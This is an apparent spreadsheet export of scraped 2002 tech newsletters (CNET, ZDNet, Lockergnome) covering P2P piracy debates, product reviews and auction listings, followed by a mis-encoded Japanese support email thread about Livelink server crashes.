Â $99 Tech ConferenceÂ The GnomeSTORE
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BookÂ General Feedback
Â E-mail the Editor
Â The Editor's Blog
Â MP3 SOFTWARE
Havas MP3 Pro
Magix MP3 Maker
Ejay MP3
Audiostation 5.0
Jack The MP3 Ripper
Pearson MP3 Maker
Steinberg My MP3
MusicMatch Jukebox 7.0
Hip Hop E-jay Record
MP3-Wolf
MP3 Maker Gold
The MP3 Wizard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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.The Lone Shoe
Â 
CLICK HERE TO ZOOMÂ 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.I can't seem to find time to procrastinate...</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | News.contextÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 11, 2002
Hollywood &amp; Silicon Valley: A way out?
		The controversy over digital file swapping is no closer to an amicable resolution than it was when peer-to-peer technology first came into vogue.
Charlie Cooper, Executive Editor/Commentary
		Â 
Just desserts for scofflawsU.S. Rep. Howard L. Berman weighed in this week, arguing that piracy over P2P networks robs songwriters on a massive scale. The congressman from Hollywood has authored a bill to stop illegal digital downloads by giving copyright owners the ability to technologically impair the distribution of copyrighted works.Read Full Story Spotting a scam in sheep's clothingBerman's proposal received a cool reception in Silicon Valley, where rules are frowned upon and unfettered innovation reigns supreme. So it was that StreamCast CEO Steve Griffin spoke for many in the community when he wrote that Berman's proposal won't work. What's more, he wondered, was Berman really concerned about controlling piracy, or could the congressman from Hollywood be influenced by certain constituents? Conspiracy buffs this week had a field day.
Read Full Story How to curb digital piracyThe odds that either side will raise the white flag are slim. But must this debate necessarily turn into an endless donnybrook? Former White House staffer Jonathan Greenblatt doesn't buy into historical determinism, and believes Hollywood can respond to the challenge of new media. First, it must shy away from any legislation that aims to control technology or enforces any "draconian" digital rights management rules. What other suggestions does he offer? Read on.
Read Full Story 
Writing file sharing's final chapterAll this occurs as the P2P community lost one of its brighter lights. Computer scientist and entrepreneur Gene Kan died June 29. Kan, who helped to develop an early open-source version of Gnutella software, wrote a column for CNET News.com on June 21, drawing on the lessons learned from the history of peer-to-peer technology. In this highly nuanced piece, Kan offers a timely warning about what can happen when people get overly excited about new technologies.
Read Full Story CEOs: Are you too focused?Conventional wisdom has it that "focus" is de rigueur for any corporation hoping to achieve superior performance. The flip side of this argument is that markets are quick to discount the valuations of diversified companies because of perceived shortcomings. But researchers at McKinsey offer an alternative idea, suggesting that there's a particularly fertile middle ground between focus and diversification.
Read Full Story Â 
        Â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</si>
  <si>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
Auctions Weekly NewsletterAuctions
 All CNET
 T
he Web
Â 
Site
MapÂ 
â€¢Â Desktops
â€¢Â Notebooks
â€¢Â Components
â€¢Â Software
â€¢Â Input Devices
â€¢Â Networking
â€¢Â Handhelds
â€¢Â Printers
â€¢Â Memory
â€¢Â Storage
â€¢Â Electronics
â€¢Â Monitors
â€¢Â Modems
â€¢Â Scanners
â€¢Â Services
â€¢Â Digital Cameras
â€¢Â Accessories
â€¢Â MultimediaÂ Â Â Â July 11th, 2002
Intel 900MHz / 256MB PC-133 / 10X DVD / 20GB PC
Â 
Intel 900MHz Socket 370 Processor
Microstar PIII ATX Motherboard
Micron 256MB PC-133 SDRAM
Pioneer 10X DVD-ROM
8MB 2X AGP Video
64-Bit PCI Sound Card
WD/Seagate 20GB Ultra-66 HDDBidding starts at  $229Â Don't miss out, place your bid now! 
Â Â LG 12x8x32 CD-RW / 8x DVD-ROM Combo Driveâ€¢ Starting Bid $79Â Â Â Â Lexmark Z-82 Printer/Copier/Flatbed All-in-Oneâ€¢ Starting Bid $1Â Â Â Â P4 Celeron 1.7GHz/256MB PC-133nVidia 32MB/16x DVD-ROM/20GB PCâ€¢ Starting Bid $399Â Â Â Â Gravis Blackhawk Digital Programmable Joystickâ€¢ Starting Bid $6.50Â Â Â Â Gateway 15-inch TFT LCD Flat Panel Color Monitorâ€¢ Starting Bid $319Â Â Â Â PIII 733MHz/256MB PC-133/48X64-Bit Sound/8MB 2X AGP/20GB PCâ€¢ Starting Bid $299Â Â 
Â Â Displaysonic .28mm 17/20/21-inch Multisync Monitorsâ€¢ All Starting Bids at $9Â Â Ending Thursday:Â 
Ending Friday:Â 
Ending Monday:Â 
Ending Tuesday:Â 
NEC .28mm 21-inchÂ Â Â Â 
Sony .28mm 20-inchÂ 
Sony/Sun .28mm 17-inchÂ 
Sony/Sun 20-inch MultisyncÂ 
Sony/SGI 20-inch TrinitronÂ Â Â Canon CanoScan N670U 48-Bit Flatbed Scannerâ€¢ Starting Bid $1Â Â Â Â Gateway XP P4 1.8GHz/256MB PC-266 DDR
40GB 7200RPM/24x10x40 CDRW/16X DVD PCâ€¢ Starting Bid $629Â Â Â Â Maxtor 80GB ATA/100 5400RPM IDE Hard Driveâ€¢ Starting Bid $79Â Â Â Â 256MB PC-2100 Double Data Rate(DDR) 184-Pin (32x64) RAMâ€¢ Starting Bid $60Â Â Please send all questions, comments, and concerns regarding the CNET
Auctions Newsletter to auctions@cnet.com and include the
Newsletter title in the subject line.NOTE: All product information, including prices, features, and
availability, is subject to change without notice.The e-mail address for your subscription isÂ 
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â AdvertisePrice comparisons |
Product reviews |
Tech
news |
Downloads |
All CNET services</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk Daily NewsletterVeritas CEO Gary Bloom speaks out at Tech Update. 
Check out these personal laser printer picks at ZDNet Reviews. 
See how WAP works and how you should use it at Builder.com. 
Need a new job? Find one today in ZDNet's Career Center. 
CIOs talk out about the future of IT at CNET News.com. THU JUL 11, 2002Â David CourseyNext MS Office? Here's what I'd add--and delete
                The next version of Microsoft Office is due in the next year or so. If you were product manager for the industry-standard office suite, what would you add? What would you get rid of? What would you fix? Here's my wish-list Top Ten.
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: The changing geography of the Net Feds focus on cybersecurity... Passport rival... Larger iMac LCD 
Want to stop spam? Here's how YOU do it 
Tablet PCs: Very cool, but not for the masses
Keep your PC's clock up to the second! Here's how  Crucial Clicks: More from ZDNet           Laptops     2GHz to Go Intel's got two new 2GHz chips for portables. But if you have to ask how much the jump from 1.8GHz to 2GHz will cost you, you probably can't afford it.   Read reviews      Most Popular Products    Laptops 1. Gateway 600XL 2. Dell Inspiron 2600 series 3. Dell Inspiron 8200 series 4. Toshiba Satellite 2400-S251 5. Dell SmartStep 100N More popular laptops             Â SYLVIA CARRÂ Feds focus on cybersecurity... Passport rival... Larger iMac LCDWashington's finally realizing that cybersecurity is a key part of homeland defense. Plus: Sun's Liberty Alliance releases specs for a Microsoft Passport rival. And expect an iMac with a 17-inch display at Macworld. 
 Â DAVID MORGENSTERNÂ Want to stop spam? Here's how YOU do itSome of you love SpamNet, a spam-killing app recommended by David Coursey. But others say it blocks too many wanted e-mails, and offer their own tips and tricks for minimizing junk e-mail. David rounds up your suggestions. 
Â DAVID BERLINDÂ 
Tablet PCs: Very cool, but not for the masses
                While tablet PCs offer cool features, like letting you scribble notes on the screen and swivel the display, David's not sure they're right for everyone. Why? For starters, they're expensive and impractical for traveling.
Â PRESTON GRALLAÂ 
Keep your PC's clock up to the second! Here's how
                Your PC, powerful as it may be, is truly pitiful at keeping track of time. But take heart. Preston has three, free downloads that synch your PC's clock with atomic-clock servers, guaranteeing you'll always have the right time.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</si>
  <si>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Tech Update Today
VITAL SIGNS FOR JULY 11, 2002David Berlind
Moore: Speech recognition next hurdle
Speech recognition will be the next transforming technology, but that transformation 
may take another 50 years, says Intel co-founder Gordon Moore. Honored this week with 
the Presidential Medal of Freedom, Moore took time to talk about the slowing down of 
his well-known law, the economy, philanthropic priorities, and more.
Read the full interviewLatest from ZDNet News
Liberty Alliance set to battle Passport
Licensing plan could boost Microsoft
IBM looks to corner low-end storage
Bluetooth: Off and running?
Acer gloomy on tech recovery
VoiceStream, AT&amp;T Wireless to hook up?
Dell douses Lexmark speculation
Chip designer ARM launches China forayMore Enterprise News
Farber's PicksDanFarberCyberterrorists don't care about your PCForget about viruses. America's real cybersecurity concerns are the notoriously 
vulnerable computer systems that control our power and water supplies. 
Robert Vamosi offers a few ideas about how to keep the infrastructure safe.
Read the full story
Tech shores up Homeland DefenseComputer security is becoming an increasingly critical part of President Bush's 
proposal for a homeland defense department. When Bush formally proposed the department 
last month, he never mentioned the Internet or cybersecurity. But as Capitol Hill 
scrutinizes the proposal, politicians are fretting about tech-savvy terrorists--and 
insisting any new agency must shield the U.S. from electronic attacks as well.
Read the full storyBush security could get privacy czarNovell's new identity
Novell seems to understand where today's sweet spot is: providing enterprises 
with the tools they need to manage and deliver Web services against the 
identities of employees, partners, and customers. Novell, a leading Web services 
company? It just may pull it off, says Tech Update's Eric Knorr. Are you 
looking for solutions to your identity crisis? Do you think Novell can 
provide them? 
Read the full commentary
ROI calculators don"t tell the whole TCO storyIn response to David Berlind"s 
Dell's formula for ROI, TCO consultant Tom Rankin warns that 
"99 percent of TCO tools do not look at the 'total' but may look at whatever parameters 
suit the vendor to sell their products/services." His advice to clients: "Make sure they 
can write a check to the CFO after three months."Read all his adviceMicrosoft's Palladium: What the hell is it? (Here's what!)Everybody's talking about Palladium, Microsoft's new "trustworthy computing" 
architecture. But the details on what it is and how it will work are still extremely 
sketchy. My colleague, Anchordesk's David Coursey, has been putting the pieces 
together--and here's what he knows so far. Read the full commentary
Cell phone personality testWhether you're a total gear head or you like to keep things simple, 
take our cell phone personality test to find out which models suit you best.
Read the full story
David Berlind's Rx for mobile happiness
Write me at dan.farber@cnet.com
Back to topAlso on Tech Update Today
COMMENTARYÂ Why didn't mobile platforms trip Microsoft up?
Peter Judge: In the late 90s, we thought the diversity of mobile platforms 
would break Microsoft's monopoly. What went wrong?
 FEATUREÂ Storage network infrastructure: 2002 forecast
Components that interconnect storage and computing devices comprise the network 
storage infrastructure. Gartner provide forecasts for its evolution from 
2002 through 2006. How does your company implement its storage network infrastructure?
 PREVIOUSLY ON TECH UPDATE TODAYÂ Toshiba releases monster notebook
The 9.6-pound Satellite 1955-S801 desktop replacement sports a 2.2GHz Pentium 4 
desktop processor and a 16-inch display.Crucial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ZDNetVeritas CEO Gary Bloom speaks out at Tech Update.  Check out these personal laser printer picks at ZDNet Reviews.  See how WAP works and how you should use it at Builder.com.  Need a new job? Find one today in ZDNet's Career Center.  CIOs talk out about the future of IT at CNET News.com.
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</si>
  <si>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 xml:space="preserve">CNET Cool Gear
Electronics
 		All CNET
 		The Web
		Â 
Toshiba Pocket PC e310
In HandheldsOnkyo TX-DS797
In ElectronicsCanon PowerShot G2
In CamerasPioneer HTS-910DV
In ElectronicsCreative Labs Nomad Jukebox 3
In Portable ElectronicsMicrosoft Xbox
In ElectronicsPanasonic DVD-RP91 DVD player
In Electronics
July 11, 2002                     --Colin Duwe
                     Associate Editor
                     CNET Electronics
Dear readers,If the majority of your photos are posed snapshots and
landscapes, a fast camera may not matter. But if you've ever
missed a shot because your camera was busy processing the
previous photo, the Leica Digilux 1 will appeal to you. We liked
it too, and we gave it an Editors' Choice award.Leica Digilux 1: Legendary charm Â 
The legendary German lens maker takes aim at digital-era
  street photographers with the Digilux 1. A combination of
  speed, manual control, and advanced features helps this
  4-megapixel camera provide a digital option to shutterbugs
  with an eye for the decisive moment.
    Read the review  Â |Â 
    Check prices
Onkyo LS-V950: The complete packageThis home-theater kit boasts a long list of enviable
  features, including progressive-scan video output and as many
  inputs and outputs as most budget A/V receivers. And it
  sounds nice, too.
    Read the reviewÂ |Â 
    Check prices
Panasonic DMC-F7: The littlest Lumix
The baby of Panasonic's new Lumix digital camera line, this
  ultracompact 2-megapixel model offers Leica optics, a svelte
  design, and a solid, basic feature set. But how does it fare
  when it comes to performance and image quality? We slipped it
  in our shirt pocket and went out for a shoot to find out.
    Read the review  Â |Â 
	Check prices
Toshiba Pocket PC e740: 400MHz in your hand 
Powered by Intel's new 400MHz XScale processor and boasting
  integrated Wi-Fi connectivity, Toshiba's new PDA is an
  impressive mobile machine. We got hands on with it to test
  the new chips and its myriad features. See how it did.
    Read the review Â |Â 
	Check prices 
Samsung DVD-P721M: Sticking out in a crowd
Samsung's affordable DVD-P721M not only offers
  progressive-scan playback but also has a built-in Memory
  Stick slot. Is this the ideal DVD deck for owners of Sony
  digital cameras, camcorders, and MP3 players? Read the review
  to find out more.
    Read the full column Â |Â 
	Check prices 
Unitech 2U4U DMR-300: A sweet MP3 playerÂ 
This new flash-based MP3 player blew us away right out of the
  box, with its slick styling, 128MB of expandable memory,
  in-line remote control, and low price. The fact that it can
  encode WMA files in real time from any line-level
  audio source is the icing on an already very tasty cake.
    Read the review Â |Â 
	Check prices 
Siemens S46: A business-focused phone
The company's second mobile for the U.S. market picks up
  where the stylish S40 left off. Like that earlier model, this
  one is a world phone with business-centric features. How
  impressive is it?
Read the full column Â |Â 
	Check prices 
Archos Jukebox Recorder 20: Old look, new connectivityÂ 
A must-have feature for any large-capacity MP3
  player/recorder is a high-speed connection that allows for
  quick transfer of hundreds--or even thousands--of files.
  Archos's next-generation product, the 20GB Recorder 20, has a
  USB 2.0 connection, but how does it stack up against the
  competition otherwise? Read the review.
    Read the review Â |Â 
	Check prices 
Philips DVD953AT: Budget progressive-scan model
This moderately priced deck faces stiff competition from
  Toshiba, Panasonic, and Zenith budget models. How does it
  fare? Read the review to find out.
    Read the review  Â |Â 
	Check prices The last Palm OS 4 PDA
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Live tech help. Submit your question now. CNET News.com: Top CIOs on the future of IT. Find a job you love. More than 1 million postings ZDNet: This IT director has had enough of Microsoft May Editors' Choice award: Pioneer's Home Theater System HTS-910DVThe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</si>
  <si>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CNET Shopper Newsletter: MAC EditionShopper
											All CNET
											The Web
										Â 
									1
Cyber Shot DSC-F707
2
Canon PowerShot S40
3
Palm m515
4
Nikon Coolpix 995
5
Canon PowerShot G2
Â 
		All most popularLive tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoft 
Dear Reader,
											Is your Mac acting a bit sluggish? Does is sometimes choke
on large graphics files or spend more time than ever
spinning its hard drive?Adding more RAM to your Mac is an easy way to get the most 
out of your favorite game and graphics applications. But
unfortunately, figuring out what type to buy is often both 
difficult and frustrating. CNET's all-in-one Memory Configurator makes finding the perfect 
memory easy! Whether you're searching for iBook, iMac, 
or PowerBook memory, your just a few clicks away from the 
upgrade you'll need to get your system living up to its
full potential.Check out CNET's new Memory Configurator
Apple iMac
								â€¢ PowerPC G4, 800MHz
								â€¢ DVD-CDRW
								â€¢ 256MB RAM, 60GB hard drive
								Â Â Just $1,805Apple Power Mac G4  
								â€¢ PowerPC G4 867MHz
								â€¢ 128MB SDRAM
								â€¢ 60GB hard drive
								Â Â Just $1,775
Formac Gallery 1740 (DVI)
								â€¢ 17.4-inch TFT active matrix
								â€¢ ADC-to-DVI/USB/Power converter box
								â€¢ 1,280x1,024 resolution
								Â Â Just $949 Harman Kardon SoundSticks
								â€¢ Superior sound quality
								â€¢ 65 total watts maximum
								â€¢ 6-inch woofer, USB
								Â Â Just $157Palm m515
								â€¢ Free shipping available
								â€¢ 16MB, Palm OS v4.1
								â€¢ MultiMediaCard slot
								Â Â Just $312 
Canon PowerShot G2
								â€¢ 4.0-megapixel
								â€¢ 3x optical/3.6x digital zoom
								â€¢ 32MB CompactFlash card 
								Â Â Just $649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</si>
  <si>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OTC/ä¼Šæ±æ§˜
ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ã®livelinkãƒ­ã‚°ã‹ã‚‰ã¯
ç¾åœ¨ã€åŽŸå› ãŒç‰¹å®šã§ããªã„ãŸã‚
æƒ…å ±ã‚’æ•´ç†ã—ã€ç’°å¢ƒé¢ã‚’å«ã‚ã€å•é¡Œã®åˆ‡ã‚Šåˆ†ã‘ã‚’è¡Œãªã£ã¦ã„ãã¾ã™ã€‚
ãã®ãŸã‚ã«[Service for UNIX]ã«é–¢ã—ã¦å•é¡ŒãŒãªã‹ã£ãŸã®ã‹
ç¢ºèªã•ã›ã¦ã„ãŸã ãã¾ã—ãŸã€‚ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®è¦å› ã¨ã—ã¦ã€ã•ã¾ã–ã¾ãªã‚±ãƒ¼ã‚¹ãŒã‚ã‚Šã¾ã™ãŒ
ç›£æŸ»æ©Ÿèƒ½ãƒ­ãƒ¼ãƒ‰ä¸å…·åˆã€CAã®ä¸å…·åˆä»¥å¤–ã«
åŽŸå› ã®åˆ‡ã‚Šåˆ†ã‘ã®ãŸã‚ã€ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®åŽŸå› ã¨ãªã£ãŸå†…å®¹ã‚’
å ±å‘Šã—ã¦ã„ãŸã ã‘ãªã„ã§ã—ã‚‡ã†ã‹ã€‚ãªãŠã€[Service for UNIX]ã®å•é¡Œã¨ã—ã¦ã€Livelinkã®ä½¿ç”¨ã™ã‚‹ç’°å¢ƒã¨ã¯
ç›´æŽ¥é–¢ä¿‚ãªã„ã‹ã‚‚ã—ã‚Œã¾ã›ã‚“ãŒãŠçŸ¥ã‚‰ã›ã—ã¾ã™ã€‚http://www.microsoft.com/japan/support/kb/articles/JP294/3/80.htm
http://www.microsoft.com/JAPAN/support/kb/articles/JP283/0/13.HTM?LN=JA&amp;SD=S
O&amp;FR=0ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ãŒä¸€åˆ»ã‚‚æ—©ãè§£æ±ºã§ãã‚‹ã‚ˆã†
ã”å”åŠ›ãŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
ä¼Šè—¤ã€€æ­£ç¾©-------- Original Message --------
Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦  - ticket
#55606OTC1 -
Date: Tue, 30 Oct 2001 13:44:43 -0500
From: "Hitoshi Ito" &lt;&gt;
Reply-To: &lt;&gt;
To: "'it-oh'" &lt;&gt;
CC: &lt;&gt;, &lt;&gt;,&lt;&gt;, &lt;&gt;
&gt;
&gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; ä¼Šè—¤æ§˜
&gt;
&gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt;
&gt; [Service for UNIX] ã®ã”è³ªå•ã¨ã—ã¦ã€æ–°ã—ã„ãƒã‚±ãƒƒãƒˆç•ªå·ã§å–ã‚Šæ‰±ã‚ã›ã¦
&gt; ã„ãŸã ãã¾ã™ã€‚ã‚µãƒãƒ¼ãƒˆã®ãƒžãƒãƒ¼ã‚¸ãƒ£ã«ç¢ºèªã‚’å–ã‚Šã¾ã—ãŸãŒã€ç¾åœ¨ã¾ã§ã«
&gt; [Service for UNIX]ã‚’ä½¿ç”¨ã•ã‚Œã¦ã„ã‚‹ã¨ã„ã†ä¾‹ã¯èžã„ãŸã“ã¨ãŒã‚ã‚Šã¾ã›ã‚“ã€‚
&gt; å•é¡Œãªãå‹•ä½œã™ã‚‹ã‹ã©ã†ã‹ã¯ç–‘å•ãŒã‚ã‚‹ãã†ã§ã™ã€‚ã‚µãƒãƒ¼ãƒˆã•ã‚Œã¦ã„ãªã„
&gt; ç’°å¢ƒã§ã™ã—ã€å®Ÿéš›åˆ©ç”¨ã—ã¦ã„ã‚‹ã¨ã„ã†ãŠå®¢æ§˜ã‚‚ã€0ã ã¨ã„ã†ã“ã¨ã§ã™ã€‚
&gt; ï¼ˆå°‘ãªãã¨ã‚‚ã‚µãƒãƒ¼ãƒˆã®ã»ã†ã«å ±å‘Šã•ã‚Œã¦ã„ã‚‹ä¸­ã§ã¯ã€ã§ã™ãŒãƒ»ãƒ»ãƒ»ï¼‰
&gt;
&gt; ä½•ã‹ã€[Service for UNIX]ãŒåŽŸå› ã§ã¯ã€ã¨è€ƒãˆã‚‰ã‚Œã‚‹ã“ã¨ã§ã‚‚ã‚ã£ãŸã®ã§
&gt; ã—ã‚‡ã†ã‹ï¼Ÿã‚‚ã—ã€ä¸‰è±åŒ–å­¦æ§˜ã§ã€ã‚µãƒãƒ¼ãƒˆã•ã‚Œã¦ã„ã‚‹ç¯„å›²ã§ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³
&gt; ãŒèµ·ã“ã‚‹ã‹ãƒ†ã‚¹ãƒˆã‚’è¡Œãˆã‚‹ã‚ˆã†ã§ã—ãŸã‚‰ã€ç¢ºèªã—ã¦ã¿ã¦ã„ãŸã ã‘ã¾ã™ã§ã—ã‚‡ã†
&gt; ã‹ï¼Ÿã§ãã‚‹ã ã‘æŽ’é™¤ã§ãã‚‹è¦å› ã¯åˆ‡ã‚Šé›¢ã—ã¦ã„ãŸã ããŸãæ€ã„ã¾ã™ã€‚
&gt; ï¼ˆãã®ç¯€ã¯ã€ä»Šã¾ã§ã®ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã®ãƒã‚±ãƒƒãƒˆã€53121OTC1ã®ã»ã†ã§
&gt; å¯¾å¿œã„ãŸã—ã¾ã™ã€‚ï¼‰
&gt;
&gt; ã‚ˆã‚ã—ããŠé¡˜ã„è‡´ã—ã¾ã™ã€‚
&gt;
&gt; &gt; -----Original Message-----
&gt; &gt; From: it-oh [mailto:]
&gt; &gt; Sent: Tuesday, October 30, 2001 5:16 AM
&gt; &gt; To:
&gt; &gt; Cc: ; ;
&gt; &gt; ;
&gt; &gt; Subject: Re: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦ - ticket
&gt; &gt; #53121OTC1 -
&gt; &gt;
&gt; &gt;
&gt; &gt; OTC/ä¼Šæ±æ§˜
&gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt;
&gt; &gt; ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ã®ç’°å¢ƒã‚’ç¢ºèªã—ãŸã¨ã“ã‚
&gt; &gt; NTä¸Šã«LL8141ã‚µãƒ¼ãƒã¨Indexãƒ‡ãƒ¼ã‚¿ãŒã‚ã‚Šã¾ã™ãŒ
&gt; &gt; å¤–éƒ¨ãƒ‰ã‚­ãƒ¥ãƒ¡ãƒ³ãƒˆã¯ã€[Service for UNIX2.0]ã‚’ä½¿ç”¨ã—
&gt; &gt; Solaris2.6ã®FileSystemä¸Šã«å­˜åœ¨ã—ã¦ã„ã¾ã™ã€‚
&gt; &gt; ãªãŠã€Oracleã‚¨ãƒ³ã‚¸ãƒ³ã€TableSpaceã¯ã€Solarisä¸Šã«ã‚ã‚Šã¾ã™ã€‚
&gt; &gt;
&gt; &gt; éŽåŽ»ã«[Service for UNIX]ãŒåŽŸå› ã§ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ãªã£ãŸã“ã¨ã¯
&gt; &gt; ã‚ã‚Šã¾ã™ã‹ã€‚ã¾ãŸã€[Service for UNIX]ã‚’ä½¿ç”¨ã—ã¦ã„ã‚‹ãƒ¦ãƒ¼ã‚¶ã¯ã€ã©ã®ãã‚‰ã„
&gt; &gt; ã„ã‚‹ã®ã‹æŠŠæ¡ã•ã‚Œã¦ã„ã¾ã—ãŸã‚‰ãŠçŸ¥ã‚‰ã›ãã ã•ã„ã€‚
&gt; &gt;
&gt; &gt; ã‚ˆã‚ã—ããŠé¡˜ã„ã„ãŸã—ã¾ã™ã€‚
&gt; &gt;
&gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; ä¼Šè—¤ã€€æ­£ç¾©
&gt; &gt;
&gt; &gt; -------- Original Message --------
&gt; &gt; Subject: RE: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt;  - ticket #53121OTC1 -
&gt; &gt; Date: Thu, 18 Oct 2001 17:24:33 -0400
&gt; &gt; From: "Hitoshi Ito" &lt;&gt;
&gt; &gt; Reply-To: &lt;&gt;
&gt; &gt; To: "'it-oh'" &lt;&gt;
&gt; &gt; CC: &lt;&gt;,
&gt; &gt; &lt;&gt;,&lt;
&gt; &gt; &gt;, &lt;&gt;
&gt; &gt; &gt;
&gt; &gt; &gt; ã‚­ãƒ¤ãƒŽãƒ³è²©å£²ï¼ˆæ ªï¼‰
&gt; &gt; &gt; ä¼Šè—¤æ§˜
&gt; &gt; &gt;
&gt; &gt; &gt; OpenTextã®ä¼Šæ±ã§ã™ã€‚ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt;
&gt; &gt; &gt; ã‚·ã‚«ã‚´ã‹ã‚‰ã®è¿”äº‹ã§ã¯ã€ãŠé€ã‚Šã„ãŸã ã„ãŸwatch.logã‹ã‚‰ã¯ãƒ¡ãƒ¢ãƒªãŒåŽŸå› ã®ã‚ˆ
&gt; &gt; ã†ã§ã¯
&gt; &gt; &gt; ãªã„ã€ã¨ã®ã“ã¨ã§ã—ãŸã€‚ã—ã‹ã—ã€åŽŸå› ã¯ã‚ã‹ã‚‰ãªã„ãã†ã§ã™ã€‚èª ã«ç”³ã—è¨³ãª
&gt; &gt; ã„ã®ã§ã™
&gt; &gt; &gt; ãŒã€å¼•ãç¶šãLivelinkãƒ­ã‚°ã€Dr. Watsonãƒ­ã‚°ãªã©ã®å–å¾—ã‚’ãŠé¡˜ã„è‡´ã—ã¾ã™ã€‚
&gt; &gt; &gt;
&gt; &gt; &gt; èª ã«ç”³ã—è¨³ãªã„ã®ã§ã™ãŒã€ã“ã‚ŒãŒç§ã‚µãƒãƒ¼ãƒˆã®ã»ã†ã§å—ã‘ãŸé–‹ç™ºã‹ã‚‰ã®è¿”äº‹
&gt; &gt; ã§ã™ã€‚ã“
&gt; &gt; &gt; ã®ä»¶ã«é–¢ã—ã¦ã€å°æž—ãŒã‚·ã‚«ã‚´ã®é–‹ç™ºã®ã»ã†ã«ç›´æŽ¥é€£çµ¡ã‚’å–ã£ã¦ãƒ•ã‚©ãƒ­ãƒ¼ã‚’ã—
&gt; &gt; ã¦ãŠã‚Šã¾
&gt; &gt; &gt; ã™ã€‚ã„ã¤ã‚‚åŒã˜ã‚ˆã†ãªè‡³ã‚‰ãªã„å¯¾å¿œã«ãªã£ã¦ã—ã¾ã„ã€èª ã«ç”³ã—è¨³ã‚ã‚Šã¾ã›ã‚“
&gt; &gt; ã€‚
&gt; &gt; &gt;
&gt; &gt; &gt; &gt; -----Original Message-----
&gt; &gt; &gt; &gt; From: it-oh [mailto:]
&gt; &gt; &gt; &gt; Sent: Thursday, October 18, 2001 5:49 AM
&gt; &gt; &gt; &gt; To:
&gt; &gt; &gt; &gt; Cc: ; ;
&gt; &gt; &gt; &gt; ;
&gt; &gt; &gt; &gt; Subject: Re: ä¸‰è±åŒ–å­¦ã‚¨ãƒ³ã‚¸ãƒ‹ã‚¢ãƒªãƒ³ã‚°æ§˜ãƒ—ãƒ­ã‚»ã‚¹ãƒ€ã‚¦ãƒ³ã«ã¤ã„ã¦
&gt; &gt;  - ticket
&gt; &gt; &gt; &gt; #53121OTC1 -
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; OTC/ä¼Šæ±æ§˜
&gt; &gt; &gt; &gt; ãŠä¸–è©±ã«ãªã£ã¦ãŠã‚Šã¾ã™ã€‚
&gt; &gt; &gt; &gt;
&gt; &gt; &gt; &gt; é€²æ—ã®ç¢ºèªã‚’ã—ã¦ã‹ã‚‰ï¼‘é€±é–“ãŸã¡ã¾ã—ãŸã€‚
&gt; &gt; &gt; &gt; æ—¥æœ¬æ™‚é–“ã®æ˜Žæ—¥ã€å…ˆæ–¹ã«å ±å‘Šã™ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã®ã§
&gt; &gt; &gt; &gt; ã„ã¤èª¿æŸ»å ±å‘Šã‚’ã„ãŸã ã‘ã‚‹ã®ã‹ã€ã‚¹ã‚±ã‚¸ãƒ¥ãƒ¼ãƒ«ã‚’
&gt; &gt; &gt; &gt; ã”é€£çµ¡ã—ã¦ã„ãŸã ãã“ã¨ã¨ã€ç¾åœ¨ã¾ã§ã®èª¿æŸ»å†…å®¹ã‚’
&gt; &gt; &gt; &gt; ã‹ãªã‚‰ãšã€ç´„ï¼‘ï¼”æ™‚é–“å¾Œï¼ˆæ—¥æœ¬æ™‚é–“ã®é‡‘æ›œæœï¼™æ™‚ï¼‰
